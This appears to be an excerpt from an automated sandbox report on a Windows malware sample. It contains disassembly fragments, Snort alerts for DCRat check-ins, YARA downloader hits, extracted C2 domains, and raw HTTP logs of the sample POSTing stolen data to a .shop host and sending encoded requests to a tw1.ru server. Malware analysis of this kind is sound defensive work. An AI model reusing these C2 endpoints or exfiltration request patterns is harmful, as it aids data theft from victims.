Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D35FCA0 FindFirstFileExA,	11_2_00007FF64D35FCA0
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009DF406 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_009DF406

Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp ecx	12_2_00A141B1
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	12_2_00A0A1C5
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, dword ptr [00440144h]	12_2_00A08159
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	12_2_00A1E236
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp eax	12_2_00A2E3EB
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then movzx ebx, word ptr [edx]	12_2_00A16364
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	12_2_00A1C6DC
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esi+000007F0h]	12_2_00A1C6DC
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	12_2_00A1C6DF
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esi+000007F0h]	12_2_00A1C6DF
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp ecx	12_2_00A2E60E
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp ecx	12_2_00A2A7DA
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	12_2_00A26708
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov esi, ebx	12_2_00A2E891
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov word ptr [edi], ax	12_2_00A2C8C0
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esi+000007F0h]	12_2_00A1C033
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov edi, dword ptr [esi]	12_2_00A1081C
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	12_2_00A0A84C
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+ebx*4+00h]	12_2_009FE958
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov edx, dword ptr [esi+04h]	12_2_00A2E968
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov byte ptr [edx], al	12_2_00A1CB3B
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000100h]	12_2_00A1CB3B
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00A1CB3B
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp eax	12_2_00A1AB1F
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov byte ptr [edx], al	12_2_00A1CB3B
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000100h]	12_2_00A1CB3B
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00A1CB3B
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	12_2_00A06DAB
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp eax	12_2_00A0CDBF
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	12_2_00A1AEB8
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	12_2_009F8E28
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	12_2_00A18F9F
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	12_2_00A0B1F2
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esi]	12_2_00A15388
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edi]	12_2_009FF3F8
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	12_2_00A2F358
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then inc ebx	12_2_00A094B8
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, edx	12_2_00A0B458
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, ecx	12_2_00A1D5E3
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	12_2_00A2F518
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov byte ptr [edi], dl	12_2_00A1D568
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	12_2_00A0D54F
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov edi, dword ptr [esi]	12_2_00A056D8
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp ecx	12_2_00A2D780
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp eax	12_2_00A0776A
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp eax	12_2_009F776E
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	12_2_00A038C8
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp eax	12_2_00A0B9A1
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov ebx, eax	12_2_009F99B8
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov edx, dword ptr [esp]	12_2_009FFD98
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 02286B4Eh	12_2_00A2FDF8
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp edx	12_2_00A13D0C
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp edx	12_2_00A13D18
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov edx, dword ptr [esp]	12_2_00A2DE8A
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	12_2_00A19E99
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then push ebx	12_2_00A07EEB
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 4x nop then jmp eax	12_2_00A13E7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edi], ax	13_2_004368C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	13_2_0042823E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], al	13_2_00426B43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000100h]	13_2_00426B43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00426B43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	13_2_00439360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi]	13_2_0041F309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00416DF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	13_2_00416EEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_00423EA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	13_2_004347E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	13_2_00414854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp dword ptr [00441C90h]	13_2_00420073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, word ptr [edx]	13_2_00420073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [esi]	13_2_0041A824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000007F0h]	13_2_0042603B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	13_2_0040D8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+ebx*4+00h]	13_2_00408960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [00440144h]	13_2_00412161
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00438170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	13_2_00438170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, ebx	13_2_00438170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esi+04h]	13_2_00438970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, eax	13_2_004039C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	13_2_004141CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	13_2_004151FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_004159A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00401278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	13_2_00422A7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00424B27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	13_2_0041DC5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_0041DC5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	13_2_0041DC5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, edx	13_2_00415460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], al	13_2_00426B43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000100h]	13_2_00426B43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00426B43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edi]	13_2_00409400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then inc ebx	13_2_004134C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	13_2_00437CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00437CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	13_2_00437CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, ebx	13_2_00437CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], dl	13_2_00427570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	13_2_00439520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00416DCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ecx	13_2_004275EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	13_2_00437DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00437DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	13_2_00437DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, ebx	13_2_00437DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	13_2_00409DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	13_2_00410DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	13_2_0041DE72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_0041DE72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	13_2_0041DE72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 02286B4Eh	13_2_00439E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, edi	13_2_00407684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	13_2_00402E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_00424EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [esi]	13_2_0040F6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	13_2_004266E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000007F0h]	13_2_004266E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	13_2_004266E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000007F0h]	13_2_004266E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push ebx	13_2_00411EF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, edi	13_2_00407684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, edi	13_2_00407684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00411772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	13_2_00430710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	13_2_00437FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	13_2_00437FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, ebx	13_2_00437FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	13_2_00437788

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 92.53.96.121:80 -> 192.168.2.4:49745
Source: Traffic	Snort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 92.53.96.121:80 -> 192.168.2.4:49762
Source: Traffic	Snort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 92.53.96.121:80 -> 192.168.2.4:49773
Source: Traffic	Snort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 92.53.96.121:80 -> 192.168.2.4:49784

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: facilitycoursedw.shop
Source: Malware configuration extractor	URLs: doughtdrillyksow.shop
Source: Malware configuration extractor	URLs: disappointcredisotw.shop
Source: Malware configuration extractor	URLs: bargainnygroandjwk.shop
Source: Malware configuration extractor	URLs: injurypiggyoewirog.shop
Source: Malware configuration extractor	URLs: leafcalfconflcitw.shop
Source: Malware configuration extractor	URLs: computerexcudesp.shop
Source: Malware configuration extractor	URLs: publicitycharetew.shop
Source: Malware configuration extractor	URLs: backcreammykiel.shop
Source: Malware configuration extractor	URLs: http://ck66916.tw1.ru/@==gbJBzYuFDT

Yara detected Generic Downloader

Source: Yara match	File source: 15.0.Bypass.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\ProgramData\SoftwareDistribution\Bypass.exe, type: DROPPED

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 92.53.96.121 92.53.96.121

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: TIMEWEB-ASRU TIMEWEB-ASRU

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18166Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8787Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20440Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5447Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1266Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 565822Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 92Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?iUu=8R7Isg&ee5ae8efe50125d60098b1ca132932bc=49479fbd79a245ee458d40f1dd85aa54&650a0c21718513cd4feada722441e9dc=gMjRGOkJjYmNWNxMmYiZzMiVTN1UmNhBzNzMTZldTY4kTYxUWNwQmN&iUu=8R7Isg HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiI2kDO5gzN1YmYiBDOwQmN5AjNllDM4cTO2EDM5UTNklTY3MzMidDOhJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&37532c7004eeb8757d3cb2e9a0f20a99=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTntGVNZTUU5kNBRUTnFlaNdXS6xkMBpHT6lkeXJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiI2kDO5gzN1YmYiBDOwQmN5AjNllDM4cTO2EDM5UTNklTY3MzMidDOhJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj1